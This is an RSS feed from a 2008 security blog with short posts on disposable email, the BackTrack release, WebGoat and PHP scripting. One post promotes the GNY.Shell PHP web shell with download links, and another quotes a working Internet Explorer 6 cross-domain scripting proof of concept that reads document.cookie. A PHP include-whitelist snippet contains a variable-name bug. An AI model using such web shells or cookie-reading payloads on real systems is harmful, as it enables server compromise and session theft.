<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>Insane Security</title>
	<atom:link href="http://insanesecurity.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://insanesecurity.wordpress.com</link>
	<description>Only insane security is true security</description>
	<pubDate>Fri, 18 Jul 2008 17:06:31 +0000</pubDate>
	<generator>http://wordpress.org/?v=MU</generator>
	<language>en</language>
			<item>
		<title>Your temporary anonymail</title>
		<link>http://insanesecurity.wordpress.com/2008/07/18/your-temporary-anonymail/</link>
		<comments>http://insanesecurity.wordpress.com/2008/07/18/your-temporary-anonymail/#comments</comments>
		<pubDate>Fri, 18 Jul 2008 17:04:12 +0000</pubDate>
		<dc:creator>dblackshell</dc:creator>
		
		<category><![CDATA[how to]]></category>

		<category><![CDATA[random - category]]></category>

		<category><![CDATA[anonymous]]></category>

		<category><![CDATA[antispam]]></category>

		<category><![CDATA[email]]></category>

		<category><![CDATA[mail]]></category>

		<category><![CDATA[temporary email]]></category>

		<guid isPermaLink="false">http://insanesecurity.wordpress.com/?p=60</guid>
		<description><![CDATA[I don&#8217;t know if you were in those kinds of situations when you had to create multiple accounts for an online gaming/forum/website, etc. For one I sure was in that situation, and always had to create a new email address, so I could only click that f***ing validation link, even If I would never return [...]]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>I don&#8217;t know if you were in those kinds of situations when you had to create multiple accounts for an online gaming/forum/website, etc. For one I sure was in that situation, and always had to create a new email address, so I could only click that f***ing validation link, even If I would never return again to the same website&#8230; also, this email validation method always brought me a new series of spam, and I could say with a 99% safety that was due to that activation schema&#8230;</p>
<p>Not anymore, because recently I <a href="http://www.stumbleupon.com/">Stumbled Upon</a> a website which winked back at me with the following phrase:</p>
<blockquote><p>
This website provides you with disposable e-mail addresses which expire after 15 Minutes. You can read and reply to e-mails that are sent to the temporary e-mail address within the given time frame.
</p></blockquote>
<p>And it&#8217;s for real&#8230; online back at <a href="http://www.guerrilamail.com">GuerrilaMail</a>&#8230;</p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/insanesecurity.wordpress.com/60/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/insanesecurity.wordpress.com/60/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/insanesecurity.wordpress.com/60/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/insanesecurity.wordpress.com/60/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/insanesecurity.wordpress.com/60/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/insanesecurity.wordpress.com/60/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/insanesecurity.wordpress.com/60/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/insanesecurity.wordpress.com/60/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/insanesecurity.wordpress.com/60/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/insanesecurity.wordpress.com/60/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/insanesecurity.wordpress.com/60/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/insanesecurity.wordpress.com/60/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=insanesecurity.wordpress.com&blog=1442538&post=60&subd=insanesecurity&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://insanesecurity.wordpress.com/2008/07/18/your-temporary-anonymail/feed/</wfw:commentRss>
	
		<media:content url="http://a.wordpress.com/avatar/dblackshell-128.jpg" medium="image">
			<media:title type="html">dblackshell</media:title>
		</media:content>
	</item>
		<item>
		<title>GNY.shell</title>
		<link>http://insanesecurity.wordpress.com/2008/07/18/gnyshell/</link>
		<comments>http://insanesecurity.wordpress.com/2008/07/18/gnyshell/#comments</comments>
		<pubDate>Fri, 18 Jul 2008 07:02:35 +0000</pubDate>
		<dc:creator>dblackshell</dc:creator>
		
		<category><![CDATA[toolbox]]></category>

		<category><![CDATA[gny]]></category>

		<category><![CDATA[php shell]]></category>

		<category><![CDATA[rfi]]></category>

		<category><![CDATA[web shell]]></category>

		<guid isPermaLink="false">http://insanesecurity.wordpress.com/?p=57</guid>
		<description><![CDATA[
After lots of work, GNY.Shell is ready to be released. It is based on Storm7Shell. GNY.Shell offers many new features, with a few listed below:
&#62; Added precompiled VMSplice Exploit
&#62; Added IP:Port and PHP Proxy generation
&#62; Removed all images (fewer entries in access logs)
&#62; Added various scripts and loads more features
&#62; Removed some unnecessary code
&#62; Tons [...]]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><blockquote><p>
After lots of work, GNY.Shell is ready to be released. It is based on Storm7Shell. GNY.Shell offers many new features, with a few listed below:<br />
&gt; Added precompiled VMSplice Exploit<br />
&gt; Added IP:Port and PHP Proxy generation<br />
&gt; Removed all images (fewer entries in access logs)<br />
&gt; Added various scripts and loads more features<br />
&gt; Removed some unnecessary code<br />
&gt; Tons more for you to go test out the shell and find ;)
</p></blockquote>
<p>More information: <a href="http://gonullyourself.org/board/showthread.php?t=395">http://gonullyourself.org/board/showthread.php?t=395</a><br />
GNY.Shell: <a href="http://gonullyourself.org/shell.txt">http://gonullyourself.org/shell.txt</a></p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/insanesecurity.wordpress.com/57/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/insanesecurity.wordpress.com/57/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/insanesecurity.wordpress.com/57/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/insanesecurity.wordpress.com/57/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/insanesecurity.wordpress.com/57/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/insanesecurity.wordpress.com/57/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/insanesecurity.wordpress.com/57/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/insanesecurity.wordpress.com/57/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/insanesecurity.wordpress.com/57/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/insanesecurity.wordpress.com/57/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/insanesecurity.wordpress.com/57/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/insanesecurity.wordpress.com/57/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=insanesecurity.wordpress.com&blog=1442538&post=57&subd=insanesecurity&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://insanesecurity.wordpress.com/2008/07/18/gnyshell/feed/</wfw:commentRss>
	
		<media:content url="http://a.wordpress.com/avatar/dblackshell-128.jpg" medium="image">
			<media:title type="html">dblackshell</media:title>
		</media:content>
	</item>
		<item>
		<title>XdSS - cross domain site scripting</title>
		<link>http://insanesecurity.wordpress.com/2008/07/17/xdss-cross-domain-site-scripting/</link>
		<comments>http://insanesecurity.wordpress.com/2008/07/17/xdss-cross-domain-site-scripting/#comments</comments>
		<pubDate>Thu, 17 Jul 2008 21:00:36 +0000</pubDate>
		<dc:creator>dblackshell</dc:creator>
		
		<category><![CDATA[is - news]]></category>

		<category><![CDATA[cookie theft]]></category>

		<category><![CDATA[cross domain]]></category>

		<category><![CDATA[ie6]]></category>

		<category><![CDATA[internet explorer 6]]></category>

		<category><![CDATA[session hijacking]]></category>

		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://insanesecurity.wordpress.com/?p=55</guid>
		<description><![CDATA[Now available in local stores near you&#8230; I&#8217;m kinda 3 days off, but just today took the time to take a look on the feeds I follow, and came across this interesting article back at F-Secure&#8217;s blog -&#62; Internet Explorer 6 Cross-Domain Scripting Vulnerability&#8230; I bet some of you will find it very useful&#8230; Anyway [...]]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>Now available in local stores near you&#8230; I&#8217;m kinda 3 days off, but just today took the time to take a look on the feeds I follow, and came across this interesting article back at F-Secure&#8217;s blog -&gt; <a href="http://www.f-secure.com/weblog/archives/00001463.html">Internet Explorer 6 Cross-Domain Scripting Vulnerability</a>&#8230; I bet some of you will find it very useful&#8230; Anyway you can find the PoC code at <a href="http://raffon.net/research/ms/ie/crossdomain/string.html">raffon.net</a>&#8230;</p>
<p>If you&#8217;re too lazy to click here-and-there, here is the code<br />
&#8212;<br />
function win() {<br />
&nbsp;&nbsp;&nbsp;x=window.open(&#8217;http://www.google.com&#8217;);<br />
&nbsp;&nbsp;&nbsp;setTimeout (function () {<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x.location.href = new String(&#8221;javascript:alert(document.cookie)&#8221;)<br />
&nbsp;&nbsp;&nbsp;}, 3000)<br />
}<br />
&#8212;</p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/insanesecurity.wordpress.com/55/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/insanesecurity.wordpress.com/55/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/insanesecurity.wordpress.com/55/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/insanesecurity.wordpress.com/55/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/insanesecurity.wordpress.com/55/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/insanesecurity.wordpress.com/55/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/insanesecurity.wordpress.com/55/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/insanesecurity.wordpress.com/55/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/insanesecurity.wordpress.com/55/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/insanesecurity.wordpress.com/55/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/insanesecurity.wordpress.com/55/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/insanesecurity.wordpress.com/55/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=insanesecurity.wordpress.com&blog=1442538&post=55&subd=insanesecurity&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://insanesecurity.wordpress.com/2008/07/17/xdss-cross-domain-site-scripting/feed/</wfw:commentRss>
	
		<media:content url="http://a.wordpress.com/avatar/dblackshell-128.jpg" medium="image">
			<media:title type="html">dblackshell</media:title>
		</media:content>
	</item>
		<item>
		<title>Enigma?</title>
		<link>http://insanesecurity.wordpress.com/2008/07/17/enigma/</link>
		<comments>http://insanesecurity.wordpress.com/2008/07/17/enigma/#comments</comments>
		<pubDate>Thu, 17 Jul 2008 20:31:04 +0000</pubDate>
		<dc:creator>dblackshell</dc:creator>
		
		<category><![CDATA[(in)secure - code]]></category>

		<category><![CDATA[random - category]]></category>

		<category><![CDATA[ajax]]></category>

		<category><![CDATA[blog]]></category>

		<category><![CDATA[cms]]></category>

		<category><![CDATA[forum]]></category>

		<category><![CDATA[guestbook]]></category>

		<category><![CDATA[javascript]]></category>

		<category><![CDATA[lfi]]></category>

		<category><![CDATA[online shop]]></category>

		<category><![CDATA[php]]></category>

		<category><![CDATA[rfi]]></category>

		<category><![CDATA[sql injection]]></category>

		<category><![CDATA[write own code]]></category>

		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://insanesecurity.wordpress.com/?p=52</guid>
		<description><![CDATA[Now this may be interesting&#8230; Should you write your own code? &#8230; or&#8230; Download already available code?&#8230; this is a question that&#8217;s been bothering me for a while, as I think will bother others from now on (maybe)&#8230;
I&#8217;ll throw in some pros and cons about this subject&#8230; some will agree while others will not&#8230; here [...]]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>Now this may be interesting&#8230; Should you write your own code? &#8230; or&#8230; Download already available code?&#8230; this is a question that&#8217;s been bothering me for a while, as I think will bother others from now on (maybe)&#8230;<br />
I&#8217;ll throw in some pros and cons about this subject&#8230; some will agree while others will not&#8230; here we go.</p>
<ul>Downloading available code! (CMS, Blog, Guestbook, Forum, OnlineShop, etc)
</ul>
<ul>Pros</p>
<li>easy to install</li>
<li>easy configuration</li>
<li>many plug-ins</li>
<li>many updates</li>
</ul>
<ul>Cons</p>
<li>many updates, periodically need to check for them</li>
<li>once you modded a module, you&#8217;ll have to mode it in every update</li>
<li>often hard to digest code, hard to mod</li>
</ul>
<ul>Writing own code!
</ul>
<ul>Pros</p>
<li>you make it your way</li>
<li>if you know what you&#8217;re doing you can secure it pretty well</li>
<li>you update only what you use, no problems with modding</li>
<li>you constantly improve your skills</li>
</ul>
<ul>Cons</p>
<li>time consuming</li>
<li>you make it your way - yep</li>
</ul>
<p>I don&#8217;t know how other people are, but when it comes in scripting I usually do my own scripts&#8230; web applications only&#8230; while coming to desktop applications and client side script, I&#8217;d rather download them&#8230; because they usualy do not tend to be so complexly divided&#8230; that is, as mentioned already, my opinion&#8230; hoping to get some feedback on this issue&#8230;</p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/insanesecurity.wordpress.com/52/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/insanesecurity.wordpress.com/52/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/insanesecurity.wordpress.com/52/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/insanesecurity.wordpress.com/52/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/insanesecurity.wordpress.com/52/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/insanesecurity.wordpress.com/52/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/insanesecurity.wordpress.com/52/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/insanesecurity.wordpress.com/52/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/insanesecurity.wordpress.com/52/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/insanesecurity.wordpress.com/52/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/insanesecurity.wordpress.com/52/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/insanesecurity.wordpress.com/52/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=insanesecurity.wordpress.com&blog=1442538&post=52&subd=insanesecurity&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://insanesecurity.wordpress.com/2008/07/17/enigma/feed/</wfw:commentRss>
	
		<media:content url="http://a.wordpress.com/avatar/dblackshell-128.jpg" medium="image">
			<media:title type="html">dblackshell</media:title>
		</media:content>
	</item>
		<item>
		<title>WebGoat - cause everyone else is doing it!</title>
		<link>http://insanesecurity.wordpress.com/2008/07/15/webgoat-cause-everyone-else-is-doing-it/</link>
		<comments>http://insanesecurity.wordpress.com/2008/07/15/webgoat-cause-everyone-else-is-doing-it/#comments</comments>
		<pubDate>Tue, 15 Jul 2008 08:13:47 +0000</pubDate>
		<dc:creator>dblackshell</dc:creator>
		
		<category><![CDATA[(in)secure - code]]></category>

		<category><![CDATA[toolbox]]></category>

		<category><![CDATA[bypass]]></category>

		<category><![CDATA[http splitting]]></category>

		<category><![CDATA[insecure]]></category>

		<category><![CDATA[j2ee]]></category>

		<category><![CDATA[owasp]]></category>

		<category><![CDATA[sql injection]]></category>

		<category><![CDATA[web application]]></category>

		<category><![CDATA[webgoat]]></category>

		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://insanesecurity.wordpress.com/?p=51</guid>
		<description><![CDATA[The unzip and run insecure J2EE web application&#8230; at least under windows&#8230;

WebGoat is a deliberately insecure J2EE web application maintained by OWASP designed to teach web application security lessons. In each lesson, users must demonstrate their understanding of a security issue by exploiting a real vulnerability in the WebGoat application. For example, in one of [...]]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>The unzip and run insecure J2EE web application&#8230; at least under windows&#8230;</p>
<blockquote><p>
<b>WebGoat</b> is a deliberately insecure J2EE web application maintained by OWASP designed to teach web application security lessons. In each lesson, users must demonstrate their understanding of a security issue by exploiting a real vulnerability in the WebGoat application. For example, in one of the lessons the user must use SQL injection to steal fake credit card numbers. The application is a realistic teaching environment, providing users with hints and code to further explain the lesson.
</p></blockquote>
<p><a href="http://www.owasp.org/index.php/Category:OWASP_WebGoat_Project">http://www.owasp.org/index.php/Category:OWASP_WebGoat_Project</a><br />
<a href="http://code.google.com/p/webgoat/">http://code.google.com/p/webgoat/</a></p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/insanesecurity.wordpress.com/51/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/insanesecurity.wordpress.com/51/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/insanesecurity.wordpress.com/51/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/insanesecurity.wordpress.com/51/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/insanesecurity.wordpress.com/51/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/insanesecurity.wordpress.com/51/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/insanesecurity.wordpress.com/51/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/insanesecurity.wordpress.com/51/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/insanesecurity.wordpress.com/51/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/insanesecurity.wordpress.com/51/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/insanesecurity.wordpress.com/51/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/insanesecurity.wordpress.com/51/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=insanesecurity.wordpress.com&blog=1442538&post=51&subd=insanesecurity&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://insanesecurity.wordpress.com/2008/07/15/webgoat-cause-everyone-else-is-doing-it/feed/</wfw:commentRss>
	
		<media:content url="http://a.wordpress.com/avatar/dblackshell-128.jpg" medium="image">
			<media:title type="html">dblackshell</media:title>
		</media:content>
	</item>
		<item>
		<title>Different aproach on including files in PHP</title>
		<link>http://insanesecurity.wordpress.com/2008/07/09/different-aproach-on-including-files-in-php/</link>
		<comments>http://insanesecurity.wordpress.com/2008/07/09/different-aproach-on-including-files-in-php/#comments</comments>
		<pubDate>Wed, 09 Jul 2008 23:03:05 +0000</pubDate>
		<dc:creator>dblackshell</dc:creator>
		
		<category><![CDATA[(in)secure - code]]></category>

		<category><![CDATA[include]]></category>

		<category><![CDATA[include_once]]></category>

		<category><![CDATA[lfi]]></category>

		<category><![CDATA[local/remote file inclusion]]></category>

		<category><![CDATA[require]]></category>

		<category><![CDATA[require_once]]></category>

		<category><![CDATA[rfi]]></category>

		<guid isPermaLink="false">http://insanesecurity.wordpress.com/?p=50</guid>
		<description><![CDATA[A couple of days/weeks ago (don&#8217;t quite remember well) I came across Savride&#8217;s blog, where also I stumbled upon the following article Secure PHP variables $_GET, $_POST - wrapper function which was kinda hard to digest at first&#8230; to much obfuscated code in one place&#8230; it&#8217;s ok if it works for him, but for file [...]]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>A couple of days/weeks ago (don&#8217;t quite remember well) I came across Savride&#8217;s blog, where also I stumbled upon the following article <a href="http://savride.wordpress.com/2008/06/22/secure-parphp-variables-_get-_post-wrapper-function/">Secure PHP variables $_GET, $_POST - wrapper function</a> which was kinda hard to digest at first&#8230; to much obfuscated code in one place&#8230; it&#8217;s ok if it works for him, but for file inclusion I would rather have a different approach, a more lightweight one&#8230; instead of  doing all that input verification and what more there is I use the following code&#8230; more readable, and as secure as his&#8230;<br />
&#8212;<br />
&lt;?php<br />
$files  = array(&#8221;error.php&#8221;, &#8220;news.php&#8221;, &#8220;blog.php&#8221;, &#8220;download.php&#8221;);<br />
$index = (int) $_GET["file"];<br />
if($index&gt;=count($files)) {<br />
&nbsp;&nbsp;&nbsp;include($files[0]);<br />
}<br />
else {<br />
&nbsp;&nbsp;&nbsp;include($file[$index]);<br />
}<br />
?&gt;<br />
&#8212;<br />
Just as simple as that&#8230; could save a lot of effort to prevent rfi/lfi&#8230; won&#8217;t you agree?&#8230; It&#8217;s the developers choice here&#8230; I always try to find way to minimize my code while keeping it safe also&#8230;.<br />
Expecting just the expected -&gt; <a href="http://www.0x000000.com/index.php?i=305">http://www.0&#215;000000.com/</a></p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/insanesecurity.wordpress.com/50/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/insanesecurity.wordpress.com/50/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/insanesecurity.wordpress.com/50/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/insanesecurity.wordpress.com/50/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/insanesecurity.wordpress.com/50/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/insanesecurity.wordpress.com/50/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/insanesecurity.wordpress.com/50/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/insanesecurity.wordpress.com/50/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/insanesecurity.wordpress.com/50/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/insanesecurity.wordpress.com/50/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/insanesecurity.wordpress.com/50/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/insanesecurity.wordpress.com/50/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=insanesecurity.wordpress.com&blog=1442538&post=50&subd=insanesecurity&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://insanesecurity.wordpress.com/2008/07/09/different-aproach-on-including-files-in-php/feed/</wfw:commentRss>
	
		<media:content url="http://a.wordpress.com/avatar/dblackshell-128.jpg" medium="image">
			<media:title type="html">dblackshell</media:title>
		</media:content>
	</item>
		<item>
		<title>BackTrack 3 Final released!</title>
		<link>http://insanesecurity.wordpress.com/2008/06/21/backtrack-3-final-released/</link>
		<comments>http://insanesecurity.wordpress.com/2008/06/21/backtrack-3-final-released/#comments</comments>
		<pubDate>Sat, 21 Jun 2008 16:59:35 +0000</pubDate>
		<dc:creator>dblackshell</dc:creator>
		
		<category><![CDATA[is - news]]></category>

		<category><![CDATA[toolbox]]></category>

		<category><![CDATA[backtrack]]></category>

		<category><![CDATA[final]]></category>

		<category><![CDATA[liveCD]]></category>

		<category><![CDATA[pen-test]]></category>

		<category><![CDATA[release]]></category>

		<guid isPermaLink="false">http://insanesecurity.wordpress.com/?p=49</guid>
		<description><![CDATA[Got the info today from the penetration testing mailinglist back at security focus&#8230;

BackTrack is the result of merging the two innovative penetration testing live linux distributions Auditor and Whax. Backtrack provides a thorough pentesting environment which is bootable via CD, USB or the network (PXE). The tools are arranged in an intuitive manner, and cover [...]]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>Got the info today from the penetration testing mailinglist back at <a href="http://www.securityfocus.com">security focus</a>&#8230;</p>
<blockquote><p>
BackTrack is the result of merging the two innovative penetration testing live linux distributions Auditor and Whax. Backtrack provides a thorough pentesting environment which is bootable via CD, USB or the network (PXE). The tools are arranged in an intuitive manner, and cover most of the attack vectors. Complex environments are simplified, such as automatic Kismet configuration, one click Snort setup, precompiled Metasploit lorcon modules, etc. BackTrack has been dubbed the #1 Security Live CD by Insecure.org, and #36 overall.
</p></blockquote>
<p><a href="http://www.remote-exploit.org/backtrack.html">BackTrack Webpage</a></p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/insanesecurity.wordpress.com/49/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/insanesecurity.wordpress.com/49/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/insanesecurity.wordpress.com/49/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/insanesecurity.wordpress.com/49/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/insanesecurity.wordpress.com/49/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/insanesecurity.wordpress.com/49/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/insanesecurity.wordpress.com/49/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/insanesecurity.wordpress.com/49/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/insanesecurity.wordpress.com/49/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/insanesecurity.wordpress.com/49/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/insanesecurity.wordpress.com/49/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/insanesecurity.wordpress.com/49/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=insanesecurity.wordpress.com&blog=1442538&post=49&subd=insanesecurity&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://insanesecurity.wordpress.com/2008/06/21/backtrack-3-final-released/feed/</wfw:commentRss>
	
		<media:content url="http://a.wordpress.com/avatar/dblackshell-128.jpg" medium="image">
			<media:title type="html">dblackshell</media:title>
		</media:content>
	</item>
		<item>
		<title>manual renaming&#8230;</title>
		<link>http://insanesecurity.wordpress.com/2008/06/20/manual-renaming/</link>
		<comments>http://insanesecurity.wordpress.com/2008/06/20/manual-renaming/#comments</comments>
		<pubDate>Fri, 20 Jun 2008 19:33:28 +0000</pubDate>
		<dc:creator>dblackshell</dc:creator>
		
		<category><![CDATA[random - category]]></category>

		<category><![CDATA[apache]]></category>

		<category><![CDATA[manual]]></category>

		<category><![CDATA[.htm.en]]></category>

		<guid isPermaLink="false">http://insanesecurity.wordpress.com/?p=48</guid>
		<description><![CDATA[I recently installed Apache on my home computer, and as not being a regular Apache user (for own webapp development I use Abyss X1, kinda my first ever installed webserver) I wanted to take a look in the manual pages&#8230; opened up index.html, and for my surprize there was a blank page (well, actually not [...]]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>I recently installed <a href="http://apache.org/">Apache</a> on my home computer, and as not being a regular Apache user (for own webapp development I use <a href="http://www.aprelium.com/">Abyss X1</a>, kinda my first ever installed webserver) I wanted to take a look in the manual pages&#8230; opened up index.html, and for my surprize there was a blank page (well, actually not blank, but no informational text for sure&#8230;)</p>
<p>The problem was that I realized that the pages (that I where looking for) where under the .html.en extension&#8230; :(&#8230; at first I tried to modify them manually&#8230; which was a real pain in the fingers&#8230; and my plain mind helped me realize (at half of the files being renamed) that a script would me more useful&#8230; dah&#8230;<br />
<br />
&#8212;<br />
system(&#8221;cmd /c del *.html&#8221;);<br />
$handle = opendir(&#8221;.&#8221;);<br />
while($file = readdir($handle)) {<br />
&nbsp;&nbsp;if(preg_match(&#8221;/\.en/&#8221;, $file)) {<br />
&nbsp;&nbsp;&nbsp;&nbsp;$newfile = str_replace(&#8221;.en&#8221;, &#8220;&#8221;, $file);<br />
&nbsp;&nbsp;&nbsp;&nbsp;system(&#8221;cmd /c copy $file $newfile&#8221;);<br />
&nbsp;&nbsp;}<br />
}<br />
&#8212;<br />
<br />
This way maybe you won&#8217;t go through the same shit I went&#8230;</p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/insanesecurity.wordpress.com/48/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/insanesecurity.wordpress.com/48/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/insanesecurity.wordpress.com/48/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/insanesecurity.wordpress.com/48/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/insanesecurity.wordpress.com/48/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/insanesecurity.wordpress.com/48/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/insanesecurity.wordpress.com/48/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/insanesecurity.wordpress.com/48/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/insanesecurity.wordpress.com/48/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/insanesecurity.wordpress.com/48/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/insanesecurity.wordpress.com/48/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/insanesecurity.wordpress.com/48/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=insanesecurity.wordpress.com&blog=1442538&post=48&subd=insanesecurity&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://insanesecurity.wordpress.com/2008/06/20/manual-renaming/feed/</wfw:commentRss>
	
		<media:content url="http://a.wordpress.com/avatar/dblackshell-128.jpg" medium="image">
			<media:title type="html">dblackshell</media:title>
		</media:content>
	</item>
		<item>
		<title>This is just plain dumb!?</title>
